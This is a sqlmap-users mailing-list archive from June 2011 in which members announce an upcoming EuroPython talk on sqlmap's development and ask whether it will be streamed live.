If it is, be sure to point us in the right direction afterwards :) On 22 June 2011 17:11, Ahmed Shawky <ah...@is...> wrote: > will it be streamed live ? > > > On Wed, Jun 22, 2011 at 6:06 PM, Bernardo Damele A. G. < > ber...@gm...> wrote: > >> Hi, >> >> Tomorrow at 5:15PM GMT+1, Miroslav will be presenting at EuroPython >> 2011 conference in Firenze, Italy. >> >> The talk is titled "sqlmap - security development in python". >> >> Abstract follows: >> """ >> The "sqlmap" is one of the largest, widely used and most active Python >> projects in the IT security community (more than 2000 commits in one >> year period with community of over 100 active testers). It combines >> its developers' strong security knowledge together with analytical, >> mathematical and Python development skills to provide IT professionals >> with vibrant features. >> >> Talk would be consisted of several parts: short introduction to >> project and developers, developing and testing environment, >> programming cycle, program's workflow, technologies used, common >> pitfalls and how we've circumvent them, usage of mathematical models, >> optimizations, project's future goals. >> >> The significant part of this talk would be the immediate insight into >> the developing process of probably the world's most advanced >> open-source Python IT security project today. >> """ >> >> Reference: >> http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python >> . >> >> Don't miss it if you are there, it will be a blast! :) >> >> Good luck Miroslav, >> Bernardo >> >> >> -- >> Bernardo Damele A. G. >> >> E-mail / Jabber: bernardo.damele (at) gmail.com >> Mobile: +447788962949 (UK 07788962949) >> PGP Key ID: Unavailable >> >> >> ------------------------------------------------------------------------------ >> Simplify data backup and recovery for your virtual environment with >> vRanger. >> Installation's a snap, and flexible recovery options mean your data is >> safe, >> secure and there when you need it. Data protection magic? >> Nope - It's vRanger. Get your free trial download today. >> http://p.sf.net/sfu/quest-sfdev2dev >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > > - Ahmed Shawky El-Antry > - Pen-tester, Programmer and System administrator > - lnxg33k owner "http://lnxg33k.wordpress.com" > - Isecur1ty team member"http://www.isecur1ty.org" > - Twitter @lnxg33k > > > > > ------------------------------------------------------------------------------ > Simplify data backup and recovery for your virtual environment with > vRanger. > Installation's a snap, and flexible recovery options mean your data is > safe, > secure and there when you need it. Data protection magic? > Nope - It's vRanger. Get your free trial download today. > http://p.sf.net/sfu/quest-sfdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-06-22 16:13:19
|
I don't really know. Check on the conference site. B. On 22 June 2011 17:11, Ahmed Shawky <ah...@is...> wrote: > will it be streamed live ? > > On Wed, Jun 22, 2011 at 6:06 PM, Bernardo Damele A. G. > <ber...@gm...> wrote: >> >> Hi, >> >> Tomorrow at 5:15PM GMT+1, Miroslav will be presenting at EuroPython >> 2011 conference in Firenze, Italy. >> >> The talk is titled "sqlmap - security development in python". >> >> Abstract follows: >> """ >> The "sqlmap" is one of the largest, widely used and most active Python >> projects in the IT security community (more than 2000 commits in one >> year period with community of over 100 active testers). It combines >> its developers' strong security knowledge together with analytical, >> mathematical and Python development skills to provide IT professionals >> with vibrant features. >> >> Talk would be consisted of several parts: short introduction to >> project and developers, developing and testing environment, >> programming cycle, program's workflow, technologies used, common >> pitfalls and how we've circumvent them, usage of mathematical models, >> optimizations, project's future goals. >> >> The significant part of this talk would be the immediate insight into >> the developing process of probably the world's most advanced >> open-source Python IT security project today. >> """ >> >> Reference: >> http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python. >> >> Don't miss it if you are there, it will be a blast! :) >> >> Good luck Miroslav, >> Bernardo >> >> >> -- >> Bernardo Damele A. G. >> >> E-mail / Jabber: bernardo.damele (at) gmail.com >> Mobile: +447788962949 (UK 07788962949) >> PGP Key ID: Unavailable >> >> >> ------------------------------------------------------------------------------ >> Simplify data backup and recovery for your virtual environment with >> vRanger. >> Installation's a snap, and flexible recovery options mean your data is >> safe, >> secure and there when you need it. Data protection magic? >> Nope - It's vRanger. Get your free trial download today. >> http://p.sf.net/sfu/quest-sfdev2dev >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > -- > > Ahmed Shawky El-Antry > Pen-tester, Programmer and System administrator > lnxg33k owner "http://lnxg33k.wordpress.com" > Isecur1ty team member"http://www.isecur1ty.org" > Twitter @lnxg33k > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Ahmed S. <ah...@is...> - 2011-06-22 16:12:06
|
will it be streamed live ? On Wed, Jun 22, 2011 at 6:06 PM, Bernardo Damele A. G. < ber...@gm...> wrote: > Hi, > > Tomorrow at 5:15PM GMT+1, Miroslav will be presenting at EuroPython > 2011 conference in Firenze, Italy. > > The talk is titled "sqlmap - security development in python". > > Abstract follows: > """ > The "sqlmap" is one of the largest, widely used and most active Python > projects in the IT security community (more than 2000 commits in one > year period with community of over 100 active testers). It combines > its developers' strong security knowledge together with analytical, > mathematical and Python development skills to provide IT professionals > with vibrant features. > > Talk would be consisted of several parts: short introduction to > project and developers, developing and testing environment, > programming cycle, program's workflow, technologies used, common > pitfalls and how we've circumvent them, usage of mathematical models, > optimizations, project's future goals. > > The significant part of this talk would be the immediate insight into > the developing process of probably the world's most advanced > open-source Python IT security project today. > """ > > Reference: > http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python > . > > Don't miss it if you are there, it will be a blast! :) > > Good luck Miroslav, > Bernardo > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: Unavailable > > > ------------------------------------------------------------------------------ > Simplify data backup and recovery for your virtual environment with > vRanger. > Installation's a snap, and flexible recovery options mean your data is > safe, > secure and there when you need it. Data protection magic? > Nope - It's vRanger. Get your free trial download today. > http://p.sf.net/sfu/quest-sfdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- - Ahmed Shawky El-Antry - Pen-tester, Programmer and System administrator - lnxg33k owner "http://lnxg33k.wordpress.com" - Isecur1ty team member"http://www.isecur1ty.org" - Twitter @lnxg33k |
48 messages has been excluded from this view by a project administrator.
